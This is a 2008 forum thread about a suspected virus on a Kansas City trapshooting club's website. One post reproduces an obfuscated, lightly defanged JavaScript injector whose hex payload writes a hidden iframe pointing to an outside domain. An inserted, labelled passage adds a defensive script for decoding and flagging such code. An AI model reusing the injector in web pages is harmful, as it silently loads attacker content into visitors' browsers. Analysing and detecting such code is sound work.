
VIRUS ON KCTA website. Do not go there!

Discussion in 'Uncategorized Threads' started by timb99, Jul 15, 2008.

Thread Status:
Not open for further replies.
  1. timb99

    timb99 Well-Known Member

    Joined:
    Jan 29, 1998
    Messages:
    7,331
    Location:
    Shawnee, Kansas, USA
    MIA,

    I alerted Lynn Gipson of KCTA by e-mail this morning when I saw your post.

    Both he and his webmaster did some checking and found no evidence of a virus.

    Tim
     
  2. tachyon

    tachyon Member

    Joined:
    Jan 29, 1998
    Messages:
    670
    Tim, I just loaded the main page from the www.kctraps.com main page into a sandbox on Linux and the source code showed an interesting obfuscated JavaScript script.

    The script is:

    it starts with script type equals text/javascript


    fanction CD6384633F353B1396D(B5635AC29A86560115DE03A){function EAD7E4C4E9F091E56D1C9FE34583A5E5(){var EC407A783CF6DB252F7E6CB0A4B6450D=16;return EC407A783CF6DB252F7E6CB0A4B6450D;}return(parseInt(B5635AC29A86560115DE03A,EAD7E4C4E9F091E56D1C9FE34583A5E5()));}function C939DE28B8E5BC28CBBC9D6(A70DE68E59771F46F023A11038E4FE9){function D9D54C05E46CACB4D1406197EADE094D(){return 2;}var AADEE34F9FDF67C2E="";for(CC4B6642370B181233866=0;CC4B6642370B181233866<A70DE68E59771F46F023A11038E4FE9.length;CC4B6642370B181233866+=D9D54C05E46CACB4D1406197EADE094D()){AADEE34F9FDF67C2E+=(String.fromCharCode(CD6384633F353B1396D(A70DE68E59771F46F023A11038E4FE9.substr(CC4B6642370B181233866,D9D54C05E46CACB4D1406197EADE094D()))));}document.write(AADEE34F9FDF67C2E);}C939DE28B8E5BC28CBBC9D6("3C696672616D65207372633D22687474703A2F2F6D6172736F686F64696B692E6E65742F6367692D62696E2F696E6465782E6367693F6865726E222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");


    I do not have the time or inclination to decipher the script. I did change function to fanction as a precaution. I do know that many virus detection processes will flag any script like the above as a potential threat. The SANS site at
    http://isc.sans.org/diary.html?storyid=4246 gives a number of strategies for deciphering this type of code. If this is a script they wrote, I do not understand why they have done it in this way.
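
Added example, not part of the post above or of the site's code: a JavaScript sketch that statically triages this style of script, where a quoted hex string is turned into markup with parseInt(..., 16) and String.fromCharCode and handed to document.write. It decodes the string without evaluating anything and reports any iframe the markup would inject. All function names, SAMPLE and the example.invalid host are constructed for illustration.

```javascript
// Static triage of a hex-encoded document.write() script: nothing is evaluated.
// SAMPLE is constructed for this example; example.invalid is a reserved placeholder host.
const toHex = text =>
  Array.from(text, c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("").toUpperCase();
const SAMPLE_MARKUP =
  '<iframe src="http://example.invalid/cgi-bin/index.cgi" width=1 height=1 ' +
  'style="visibility:hidden;position:absolute"></iframe>';
const SAMPLE = 'function A1(x){return parseInt(x,16);}' +
  'function B2(s){var o="";for(i=0;i<s.length;i+=2){o+=String.fromCharCode(A1(s.substr(i,2)));}' +
  'document.write(o);}B2("' + toHex(SAMPLE_MARKUP) + '");';

// Pull out quoted string literals that are long, even-length and purely hex digits.
function extractHexLiterals(source, minLength = 32) {
  const found = [];
  for (const m of source.matchAll(/(["'])([0-9A-Fa-f]+)\1/g)) {
    if (m[2].length >= minLength && m[2].length % 2 === 0) found.push(m[2]);
  }
  return found;
}

// Decode two hex digits per character, the same mapping the script applies at run time.
function decodeHex(hex) {
  let out = "";
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// List iframes in decoded markup and flag ones sized or styled to be invisible.
function findIframes(markup) {
  const frames = [];
  for (const m of markup.matchAll(/<iframe\b([^>]*)>/gi)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    const tiny = /\bwidth\s*=\s*["']?[01]\b/i.test(m[1]) &&
                 /\bheight\s*=\s*["']?[01]\b/i.test(m[1]);
    const hiddenStyle = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(m[1]);
    frames.push({ src: src ? src[1] : null, hidden: tiny || hiddenStyle });
  }
  return frames;
}

// Full pass: every hex literal in the page source, decoded and scanned for iframes.
const triage = source => extractHexLiterals(source).flatMap(h => findIframes(decodeHex(h)));

console.log(triage(SAMPLE));
```

Run it over saved page source (for example, text fetched with a command-line client) rather than in a browser, so the decoded markup is only ever handled as a string.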
     
  3. once fired

    once fired Guest

    I talked to our webmaster, they alerted the linex server folks, and all is supposed to be OK. I don't know a lot about the virus scans out there, but when I did a Google search on win32/heur and read up a bit, I got the feeling that AVG may have some issues when it comes to the win32/heur virus. Seems that at times, AVG detects something that's not there. Like I said, I don't know much about these things. I use AVG also; I've been to my website in the last couple of minutes and had no problems. Nothing has been changed in the source code of the website in years. We don't get in any hurry to change things around here; it makes most trapshooters nervous.

    Lynn Gipson
     
  4. valmet

    valmet TS Supporters

    Joined:
    Jan 29, 1998
    Messages:
    395
    Location:
    Bemidji, Mn
    !!!!!!
     
  5. mette56

    mette56 Well-Known Member

    Joined:
    Jul 8, 2008
    Messages:
    2,026
    Location:
    Camdenton, MO
    Lynn,

    Nervous trap shooters at the KCTA???

    Boy, that answers a lot of questions. Being a two-time past president, I now know why I've been a nervous wreck the last 30 years. I thought it was "hard lefts from post one" all this time.....LOL.

    Milt
     